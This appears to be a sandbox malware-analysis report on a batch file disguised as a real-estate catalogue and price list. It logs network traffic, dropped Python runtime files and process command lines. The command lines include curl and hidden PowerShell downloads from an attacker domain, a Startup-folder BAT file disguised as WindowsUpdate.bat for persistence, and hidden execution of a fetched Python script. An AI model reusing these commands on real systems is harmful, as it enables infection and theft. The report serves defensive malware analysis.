Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940

Source: unknown	HTTPS traffic detected: 104.21.36.187:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.187:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.187:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.187:443 -> 192.168.2.5:49995 version: TLS 1.2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\python39\DLLs\python_tools.cat

Jump to dropped file

System Summary

Found large BAT file

Source: Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat

Static file information: 2120253

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\libffi-7.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\win32\odbc.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pythonwin\Pythonwin.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\vcruntime140_1.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_lzma.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\libssl-1_1.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\unicodedata.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\websockets\speedups.cp39-win_amd64.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\python39.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_overlapped.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_sqlite3.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pythonwin\dde.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\win32\pythonservice.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\sqlite3.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pythonwin\win32uiole.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_asyncio.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\win32\perfmon.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pythonwin\scintilla.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_elementtree.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_ctypes_test.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_ssl.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_multiprocessing.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_msi.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\select.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\win32\perfmondata.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pywin32_system32\pythoncom39.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_uuid.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_queue.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_zoneinfo.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pythonwin\win32ui.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_bz2.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\win32\mmapfile.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_ctypes.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\win32\servicemanager.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\python.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pythonwin\mfc140u.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\pyexpat.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pywin32_system32\pywintypes39.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_hashlib.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_socket.pyd	Jump to dropped file

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\Public\python39\DLLs\_asyncio.pyd 3E521E119CFAD53C8FCF67BBF26DE2ECFFE24CB13079F36A22339F0F8AD297A6

Source: classification engine

Classification label: mal100.expl.evad.winBAT@35/1550@17/8

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\Public\python39

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aeoj1cds.cnx.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat" "

Source: C:\Windows\System32\cmd.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Windows\System32\curl.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://sealingshop.click/bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs4543544325445344eiofujoisuedsfdddddjjjjkfoisuefoiu434534343iosuioeufiosuio453453543543344444345345645745suefiosuieofusoiufiosefuioeuio -o "C:\\Users\\Public\\libs.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.com/
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2156,i,11219645058494437623,14001891473156078966,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://sealingshop.click/app/python39.zip -o "C:\\Users\\Public\\python39\\python39.zip"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -windowstyle hidden C:\\Users\\Public\\python39\\python C:\\Users\\Public\\python39\\documents.py;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden C:\\Users\\Public\\python39\\python C:\\Users\\Public\\python39\\documents.py;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden Expand-Archive C:\\Users\\Public\\python39\\python39.zip -DestinationPath C:\\Users\\Public\\python39
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://sealingshop.click/py/rose_tien -o "C:\\Users\\Public\\python39\\documents.py"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\python39\python.exe C:\\Users\\Public\\python39\\python.exe "C:\\Users\\Public\\python39\\documents.py"
